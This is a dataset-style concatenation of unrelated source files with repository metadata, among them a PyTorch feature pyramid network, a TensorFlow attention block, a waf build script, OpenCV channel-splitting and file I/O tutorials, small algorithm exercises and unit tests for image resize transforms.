|
[
"[email protected]"
] | |
9c916129fe72fbdc76aaf2997d9bbdfa460fd235
|
de54e5ddf4d350176d70c2bb1501b878285a18b8
|
/fpn.py
|
04a74603728490c73565dff2f7b4854aee3e9411
|
[] |
no_license
|
lizhe960118/find-star
|
e1d73b78b29087ca2e83990354b96b7406eaedf4
|
e233dca4fe9a5faf6df9b6a4e0b2f29a7eb096b0
|
refs/heads/master
| 2020-05-18T10:55:52.008399 | 2019-05-01T03:49:32 | 2019-05-01T03:49:32 | 184,363,943 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,390 |
py
|
'''RetinaFPN in PyTorch.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.downsample = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.downsample = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.downsample(x)
out = F.relu(out)
return out
# Basic residual block
class ResNetBasicBlock(nn.Module):
expansion = 1
def __init__(self, in_channel, out_channel, stride=1, downsample=None):
super(ResNetBasicBlock, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, kernel_size=3, stride=stride, padding=1),
nn.BatchNorm2d(out_channel))
self.relu = nn.ReLU(inplace=True)
self.layer2 = nn.Sequential(
nn.Conv2d(out_channel, out_channel, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(out_channel))
self.downsample = downsample
self.stride = stride
def forward(self,x):
residual = x
out = self.layer1(x)
out = self.relu(out)
out = self.layer2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class FPN(nn.Module):
def __init__(self, block, num_blocks):
super(FPN, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) # 3*3 s1
self.bn1 = nn.BatchNorm2d(64)
self.conv2 = nn.Conv2d(64, 64, kernel_size=1, stride=1, bias=False) # 1*1 s1
self.bn2 = nn.BatchNorm2d(64)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=2, padding=1, bias=False) # 3*3 s2
self.bn3 = nn.BatchNorm2d(64)
# Bottom-up layers
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.conv5 = nn.Conv2d(1024, 256, kernel_size=3, stride=2, padding=1)
# self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
# self.conv6 = nn.Conv2d(2048, 256, kernel_size=3, stride=2, padding=1)
# self.conv7 = nn.Conv2d( 256, 256, kernel_size=3, stride=2, padding=1)
# Lateral layers
# self.latlayer1 = nn.Conv2d(2048, 256, kernel_size=1, stride=1, padding=0)
# self.latlayer2 = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)
# self.latlayer3 = nn.Conv2d( 512, 256, kernel_size=1, stride=1, padding=0)
self.latlayer1 = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)
self.latlayer2 = nn.Conv2d(512, 256, kernel_size=1, stride=1, padding=0)
self.latlayer3 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
# Top-down layers
self.toplayer1 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
self.toplayer2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def _upsample_add(self, x, y):
'''Upsample and add two feature maps.
Args:
x: (Variable) top feature map to be upsampled.
y: (Variable) lateral feature map.
Returns:
(Variable) added feature map.
Note in PyTorch, when input size is odd, the upsampled feature map
with `F.upsample(..., scale_factor=2, mode='nearest')`
        may not be equal to the lateral feature map size.
e.g.
original input size: [N,_,15,15] ->
conv2d feature map size: [N,_,8,8] ->
upsampled feature map size: [N,_,16,16]
So we choose bilinear upsample which supports arbitrary output sizes.
'''
_,_,H,W = y.size()
return F.upsample(x, size=(H,W), mode='bilinear') + y
def forward(self, x):
# Bottom-up
c1 = F.relu(self.bn1(self.conv1(x)))
c1 = F.relu(self.bn2(self.conv2(c1)))
c1 = F.relu(self.bn3(self.conv3(c1)))
# c1 = F.max_pool2d(c1, kernel_size=3, stride=2, padding=1)
c2 = self.layer1(c1) # 300 * 300
c3 = self.layer2(c2)
c4 = self.layer3(c3)
p5 = self.conv5(c4)
# c5 = self.layer4(c4)
# p6 = self.conv6(c5)
# p7 = self.conv7(F.relu(p6))
# Top-down
p4 = self.latlayer1(c4)
p3 = self._upsample_add(p4, self.latlayer2(c3))
p3 = self.toplayer1(p3)
p2 = self._upsample_add(p3, self.latlayer3(c2))
p2 = self.toplayer2(p2)
# p5 = self.latlayer1(c5)
# p4 = self._upsample_add(p5, self.latlayer2(c4))
# p4 = self.toplayer1(p4)
# p3 = self._upsample_add(p4, self.latlayer3(c3))
# p3 = self.toplayer2(p3)
return p2, p3, p4, p5
def FPN50():
# return FPN(Bottleneck, [3,4,6,3])
return FPN(Bottleneck, [3, 4, 6])
def FPN101():
    # ResNet-101 uses block counts [3, 4, 23, 3]; only the first three stages
    # are consumed by this truncated FPN.
    return FPN(Bottleneck, [3, 4, 23, 3])
def test():
net = FPN50()
# fms = net(Variable(torch.randn(1,3,600,300)))
fms = net(Variable(torch.randn(1, 3, 832, 832)))
for fm in fms:
print(fm.size())
# test()
|
[
"[email protected]"
] | |
95ad4fd20d715d2b592087416dd9db29358e23b9
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02407/s580407099.py
|
11041f9012ef0a39f8fbc696d88e6c36fe254b03
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 173 |
py
|
n = int(input())
a = list(map(int,input().split()))
a.reverse()
for i,elem in enumerate(a):
if i != 0:
print (" ", end='')
print (elem, end='')
print ('')
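# Hypothetical shorthand (not in the original file): after a.reverse(), the
# printing loop above is equivalent to:
#   print(' '.join(map(str, a)))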
|
[
"[email protected]"
] | |
37416ae207a95ca269005d08f020dd3f0e703430
|
14de7abd1267122ad128c130f45ff86a087ed5cd
|
/nlp/match_blocks.py
|
7e4efbe57c5b3b8a5ce86ca674e74a43cecd808f
|
[
"MIT"
] |
permissive
|
saurabhXcode/tf-attentive-conv
|
64124c470acdb26125680d903cc97ae1cc68a4b9
|
8dcc403575392c8e5c6c287432272a781410c49c
|
refs/heads/master
| 2020-04-12T12:21:35.091291 | 2018-08-11T00:26:44 | 2018-08-11T00:26:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,308 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <[email protected]> <https://hanxiao.github.io>
import tensorflow as tf
from nlp.encode_blocks import CNN_encode
from nlp.nn import linear_logit, dropout_res_layernorm
def AttentiveCNN_match(context, query, context_mask, query_mask,
scope='AttentiveCNN_Block', reuse=None, **kwargs):
with tf.variable_scope(scope, reuse=reuse):
cnn_wo_att = CNN_encode(context, filter_size=3, direction='none', act_fn=None)
att_context, _ = Attentive_match(context, query, context_mask, query_mask)
cnn_att = CNN_encode(att_context, filter_size=1, direction='none', act_fn=None)
output = tf.nn.tanh(cnn_wo_att + cnn_att)
return dropout_res_layernorm(context, output, **kwargs)
def Attentive_match(context, query, context_mask, query_mask,
score_func='dot', causality=False,
scope='attention_match_block', reuse=None, **kwargs):
with tf.variable_scope(scope, reuse=reuse):
batch_size, context_length, num_units = context.get_shape().as_list()
_, query_length, _ = query.get_shape().as_list()
if score_func == 'dot':
score = tf.matmul(context, query, transpose_b=True)
elif score_func == 'bilinear':
score = tf.matmul(linear_logit(context, num_units, scope='context_x_We'), query, transpose_b=True)
elif score_func == 'scaled':
score = tf.matmul(linear_logit(context, num_units, scope='context_x_We'), query, transpose_b=True) / \
(num_units ** 0.5)
elif score_func == 'additive':
score = tf.squeeze(linear_logit(
tf.tanh(tf.tile(tf.expand_dims(linear_logit(context, num_units, scope='context_x_We'), axis=2),
[1, 1, query_length, 1]) +
tf.tile(tf.expand_dims(linear_logit(query, num_units, scope='query_x_We'), axis=1),
[1, context_length, 1, 1])), 1, scope='x_ve'), axis=3)
else:
raise NotImplementedError
mask = tf.matmul(tf.expand_dims(context_mask, -1), tf.expand_dims(query_mask, -1), transpose_b=True)
paddings = tf.ones_like(mask) * (-2 ** 32 + 1)
masked_score = tf.where(tf.equal(mask, 0), paddings, score) # B, Lc, Lq
# Causality = Future blinding
if causality:
diag_vals = tf.ones_like(masked_score[0, :, :]) # (Lc, Lq)
tril = tf.contrib.linalg.LinearOperatorLowerTriangular(diag_vals).to_dense() # (Lc, Lq)
masks = tf.tile(tf.expand_dims(tril, 0), [tf.shape(masked_score)[0], 1, 1]) # B, Lc, Lq
paddings = tf.ones_like(masks) * (-2 ** 32 + 1)
masked_score = tf.where(tf.equal(masks, 0), paddings, masked_score) # B, Lc, Lq
query2context_score = tf.nn.softmax(masked_score, axis=2) * mask # B, Lc, Lq
query2context_attention = tf.matmul(query2context_score, query) # B, Lc, D
context2query_score = tf.nn.softmax(masked_score, axis=1) * mask # B, Lc, Lq
context2query_attention = tf.matmul(context2query_score, context, transpose_a=True) # B, Lq, D
return (query2context_attention, # B, Lc, D
context2query_attention) # B, Lq, D
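# Hypothetical shape sketch (not in the original module), following the inline
# shape comments above: with context of shape (B, Lc, D), query of shape
# (B, Lq, D), and 0/1 masks of shapes (B, Lc) and (B, Lq), Attentive_match
# returns attentions of shapes (B, Lc, D) and (B, Lq, D).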
|
[
"[email protected]"
] | |
827370360a0c207ac6273117c06be4bf6b0b163e
|
882be627c49870ae6f2f81963a3cfc9b719c0011
|
/wscript
|
601c17dd013a3c54bc088dbbc86fb37531affd98
|
[] |
no_license
|
brettviren/cogs
|
794142a04c87ce148e939f8ded852dfa1f6df9bc
|
681d1ed7e12cd2e7469a5ba3fd7261dc4f8f4c26
|
refs/heads/master
| 2022-11-30T12:26:19.624956 | 2020-08-10T12:34:44 | 2020-08-10T12:34:44 | 273,746,410 | 0 | 1 | null | 2020-08-10T12:34:45 | 2020-06-20T16:40:57 |
JavaScript
|
UTF-8
|
Python
| false | false | 2,954 |
#!/usr/bin/env waf
VERSION='0.0.0'
APPNAME='cogs'
import os.path as osp
def options(opt):
opt.load('compiler_cxx')
opt.load('waf_unit_test')
opt.add_option('--quell-tests', action='store_true', default=False,
help='Compile but do not run the tests (default=%default)')
opt.add_option('--with-ers', default=None,
help='Set to ERS install area')
opt.add_option('--with-nljs', default=None,
help='Point nlohmann json install area')
opt.add_option('--with-boost', default=None,
help='Set to BOOST install area (needed by ERS)')
def configure(cfg):
cfg.load('compiler_cxx')
cfg.load('waf_unit_test')
cfg.env.CXXFLAGS += ['-std=c++17', '-ggdb3', '-Wall', '-Werror']
## nlohmann::json
nljs = getattr(cfg.options, 'with_nljs', None)
if nljs:
print("using " + nljs)
setattr(cfg.env, 'INCLUDES_NLJS', [osp.join(nljs, "include")])
cfg.check(features='cxx cxxprogram', define_name='HAVE_NLJS',
header_name='nlohmann/json.hpp',
use='NLJS', uselib_store='NLJS', mandatory=True)
## ERS
ers = getattr(cfg.options, 'with_ers',None)
if ers:
setattr(cfg.env, 'RPATH_ERS', [osp.join(ers, 'lib')]);
setattr(cfg.env, 'LIBPATH_ERS', [osp.join(ers, 'lib')]);
setattr(cfg.env, 'INCLUDES_ERS', [osp.join(ers, 'include')]);
cfg.check(features='cxx cxxprogram', define_name='HAVE_ERS',
header='ers/ers.h', lib=['ers','ErsBaseStreams'],
use='ERS', uselib_store='ERS', mandatory=True)
## Boost is not needed directly by cogs but ERS needs it.
boost = getattr(cfg.options, 'with_boost', None)
if boost:
setattr(cfg.env, 'RPATH_BOOST', [osp.join(boost, 'lib')]);
setattr(cfg.env, 'LIBPATH_BOOST', [osp.join(boost, 'lib')]);
setattr(cfg.env, 'INCLUDES_BOOST', [osp.join(boost, 'include')]);
cfg.check(features='cxx cxxprogram', define_name='HAVE_BOOST',
header=['boost/filesystem/filesystem.hpp',
'boost/preprocessor/preprocessor.hpp'],
lib=['boost_filesystem'],
use='BOOST', uselib_store='BOOST', mandatory=True)
cfg.write_config_header('config.hpp')
def build(bld):
bld.recurse("test")
use=['ERS','BOOST','NLJS']
sources = bld.path.ant_glob('src/*.cpp');
bld.shlib(features='cxx', includes='inc',
source = sources, target='cogs',
uselib_store='COGS', use=use)
bld.install_files('${PREFIX}/include/cogs',
bld.path.ant_glob("inc/cogs/**/*.hpp"),
cwd=bld.path.find_dir('inc/cogs'),
install_path=bld.env.PREFIX + '/lib',
relative_trick=True)
from waflib.Tools import waf_unit_test
bld.add_post_fun(waf_unit_test.summary)
bld.recurse("demo")
|
[
"[email protected]"
] | ||
cdc237084299675f5c218544154e89c2be810335
|
980434e03e722eaf3a5ff4ab4f1971c8d1cde4c5
|
/宝石与石头.py
|
a2ae90f7262a28b814a440bfe3b1d2cf7a48bc01
|
[] |
no_license
|
arry-lee/arryleetcode
|
c9c548b0defc9771e4e488b3e760809364456c99
|
b4b9b971ec81a921cca606dfa46ea4109d975dfb
|
refs/heads/master
| 2020-07-26T14:11:27.645307 | 2019-09-15T23:31:09 | 2019-09-15T23:31:09 | 208,670,826 | 1 | 0 | null | null | null | null |
WINDOWS-1252
|
Python
| false | false | 172 |
py
|
# Jewels and Stones
#2019-08-17 06:20:13
class Solution:
def numJewelsInStones(self, J: str, S: str) -> int:
return len([stone for stone in S if stone in J])
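# Hypothetical variant (not in the original file): hashing J once makes each
# membership test O(1), so the scan runs in O(len(J) + len(S)) instead of
# O(len(J) * len(S)).
class SolutionWithSet:
    def numJewelsInStones(self, J: str, S: str) -> int:
        jewels = set(J)
        return sum(stone in jewels for stone in S)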
|
[
"[email protected]"
] | |
ced152ee74e1836bdeb08bcfe32e146b988939d7
|
556db265723b0cc30ad2917442ed6dad92fd9044
|
/tensorflow/python/training/experimental/mixed_precision_global_state.py
|
6f0a179db65b1ebb31c2cbc1265eaf71b2a09fd6
|
[
"MIT",
"Apache-2.0",
"BSD-2-Clause"
] |
permissive
|
graphcore/tensorflow
|
c1669b489be0e045b3ec856b311b3139858de196
|
085b20a4b6287eff8c0b792425d52422ab8cbab3
|
refs/heads/r2.6/sdk-release-3.2
| 2023-07-06T06:23:53.857743 | 2023-03-14T13:04:04 | 2023-03-14T13:48:43 | 162,717,602 | 84 | 17 |
Apache-2.0
| 2023-03-25T01:13:37 | 2018-12-21T13:30:38 |
C++
|
UTF-8
|
Python
| false | false | 2,635 |
py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains global variables related to mixed precision.
This is not part of mixed_precision.py to avoid a circular dependency.
mixed_precision.py depends on Session, and Session depends on this file.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.util.tf_export import tf_export
# Whether the mixed precision graph rewrite has been enabled or not with
# `enable_mixed_precision_graph_rewrite`. Used to turn on auto_mixed_precision
# in ConfigProtos passed to Sessions.
_mixed_precision_graph_rewrite_is_enabled = False
# True if a Session has been created without the mixed precision graph rewrite
# being enabled. Used to give a warning if mixed precision is enabled after a
# Session has already been created.
_non_mixed_precision_session_created = False
# Whether the global tf.keras.mixed_precision.Policy uses mixed precision. Used
# to raise an error message if both a mixed Policy and the graph rewrite are
# used at the same time.
_using_mixed_precision_policy = False
@tf_export('__internal__.train.is_mixed_precision_graph_rewrite_enabled', v1=[])
def is_mixed_precision_graph_rewrite_enabled():
return _mixed_precision_graph_rewrite_is_enabled
def set_mixed_precision_graph_rewrite_enabled(enabled):
global _mixed_precision_graph_rewrite_is_enabled
_mixed_precision_graph_rewrite_is_enabled = enabled
def non_mixed_precision_session_created():
return _non_mixed_precision_session_created
def set_non_mixed_precision_session_created(created):
global _non_mixed_precision_session_created
_non_mixed_precision_session_created = created
def is_using_mixed_precision_policy():
return _using_mixed_precision_policy
@tf_export('__internal__.train.set_using_mixed_precision_policy', v1=[])
def set_using_mixed_precision_policy(is_using):
global _using_mixed_precision_policy
_using_mixed_precision_policy = is_using
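# Hypothetical usage sketch (not in the original module): the setters simply
# toggle the module-level flags read by the getters.
#   set_mixed_precision_graph_rewrite_enabled(True)
#   assert is_mixed_precision_graph_rewrite_enabled()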
|
[
"[email protected]"
] | |
09018e0be0d1189db97fad7103f982719fe99170
|
e25b917f2f0ce28f6d046afaa9c0faddf0aeae34
|
/Tutorials/split_and_merging.py
|
0e4d372a63ff7e204d74bc9d502e062c6df0682b
|
[] |
no_license
|
pmusau17/ComputerVision
|
d9344c22ed1fe1bf8a8c6166a060c307c08529a5
|
2fcdce0a967567c15232fe3c9f02982ca95e5796
|
refs/heads/master
| 2020-12-11T00:30:20.292943 | 2020-06-03T21:54:36 | 2020-06-03T21:54:36 | 233,751,710 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 786 |
py
|
import numpy as np
import argparse
import cv2
#create argument parser
ap=argparse.ArgumentParser()
ap.add_argument('-i','--image', required=True)
args=vars(ap.parse_args())
#load the image
image=cv2.imread(args['image'])
(B,G,R)=cv2.split(image)
#this will display each of the channels as grayscale
cv2.imshow("Red",R)
cv2.imshow("Green",G)
cv2.imshow("Blue",B)
cv2.waitKey(0)
#merge each channel with zeros in the other two channels so each one
#displays in its own color and yields the correct prediction
zeros = np.zeros(image.shape[:2],dtype='uint8')
cv2.imshow("Red",cv2.merge([zeros,zeros,R]))
cv2.imshow("Green",cv2.merge([zeros,G,zeros]))
cv2.imshow("Blue",cv2.merge([B,zeros,zeros]))
cv2.waitKey(0)
merged=cv2.merge([B,G,R])
cv2.imshow("Merged",merged)
cv2.waitKey(0)
cv2.destroyAllWindows()
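# Hypothetical invocation (not in the original script); the image path is
# made up:
#   python split_and_merging.py --image images/example.png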
|
[
"[email protected]"
] | |
17237a95039c4b7a5d68f70a91b7049b857dfa02
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/kmp_20200716201539.py
|
c0ccf11ea7faea0cd681296187ca576428e15267
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 785 |
py
|
'''
Given a text txt[0..n-1] and a pattern pat[0..m-1],
write a function search(char pat[], char txt[]) that prints all occurrences of pat[] in txt[]. You may assume that n > m.
'''
def pattern(txt, pat):
    # Caterpillar (sliding window) algorithm:
    # keep a window [left, right) of exactly len(pat) characters,
    # compare the window against the pattern, then slide both pointers
    # right by one, printing every index where the window matches.
    left = 0
    right = len(pat)
    while right <= len(txt):
        if txt[left:right] == pat:
            print('index', left)
        left += 1
        right += 1
pattern("AABAACAADAABAABA","AABA")
|
[
"[email protected]"
] | |
d6db78cbc8e88ec12c049d25fffbbe429655373c
|
c22b9c7c4a854ed985e777bcbecd18870439b334
|
/byteofpy/file.py
|
b2c51954e6226494b8066a0e68daaff28ff6f548
|
[
"BSD-3-Clause"
] |
permissive
|
pezy/python_test
|
ceb35a8a63ca8ebe26ffa5c72ace664718c7b328
|
b019a0d9f267b5071c37fc85c9acaf27e9146625
|
refs/heads/master
| 2021-01-19T01:09:20.820202 | 2016-07-30T08:35:15 | 2016-07-30T08:35:15 | 18,096,404 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 415 |
py
|
poem = '''\
Programming is fun
When the work is done
if you wanna make your work also fun:
use Python!
'''
# Open for writing
f = open('poem.txt', 'w')
# Write text to file
f.write(poem)
f.close()
# If no mode is specified
# Read mode is assumed by default
f = open('poem.txt')
while True:
line = f.readline()
# Zero length indicates EOF
if len(line) == 0:
break
print line,
f.close()
|
[
"[email protected]"
] | |
2d5ee23a8cba0fea02e4f205bafc24f5c98fc027
|
375e5bca82843647941068bd7634cf7adf2015ca
|
/tests/test_transforms_resize_modulo_pad_crop.py
|
f72a33b918735569e106f2221c7a10a6e1392d92
|
[
"MIT"
] |
permissive
|
civodlu/trw
|
cd57e7bded7fdb0a9d623ed9cd50645fab96583b
|
11c59dea0072d940b036166be22b392bb9e3b066
|
refs/heads/master
| 2023-02-08T09:56:39.203340 | 2023-02-07T14:22:16 | 2023-02-07T14:22:16 | 195,147,670 | 12 | 2 |
MIT
| 2020-10-19T15:24:11 | 2019-07-04T01:19:31 |
Python
|
UTF-8
|
Python
| false | false | 1,864 |
py
|
import unittest
import trw
import torch
import numpy as np
class TestTransformsResizeModuloPadCrop(unittest.TestCase):
def test_crop_mode_torch(self):
batch = {
'images': torch.rand([2, 3, 64, 64], dtype=torch.float32)
}
tfm = trw.transforms.TransformResizeModuloCropPad(60)
transformed = tfm(batch)
assert transformed['images'].shape == (2, 3, 60, 60)
def test_crop_mode_torch_multiples(self):
# test with multiple of `multiples_of` shape
batch = {
'images': torch.rand([2, 3, 64, 64], dtype=torch.float32)
}
tfm = trw.transforms.TransformResizeModuloCropPad(10)
transformed = tfm(batch)
assert transformed['images'].shape == (2, 3, 60, 60)
def test_crop_mode_torch_different_shape(self):
batch = {
'images': torch.rand([2, 3, 64, 64], dtype=torch.float32),
'images2': torch.rand([2, 1, 64, 64], dtype=torch.float32)
}
batch['images'][0, 0, 32, 32] = 42.0
batch['images2'][0, 0, 32, 32] = 42.0
tfm = trw.transforms.TransformResizeModuloCropPad(60)
transformed = tfm(batch)
# make sure we can handle different shapes of the same dimension
assert transformed['images'].shape == (2, 3, 60, 60)
assert transformed['images2'].shape == (2, 1, 60, 60)
# make sure the crop/pad are the same for the different images
indices = np.where(batch['images'].numpy() == 42)
assert (batch['images2'][indices] == 42.0).all()
def test_pad_mode_torch(self):
batch = {
'images': torch.rand([2, 3, 65, 65], dtype=torch.float32)
}
tfm = trw.transforms.TransformResizeModuloCropPad(32, mode='pad')
transformed = tfm(batch)
assert transformed['images'].shape == (2, 3, 96, 96)
|
[
"[email protected]"
] |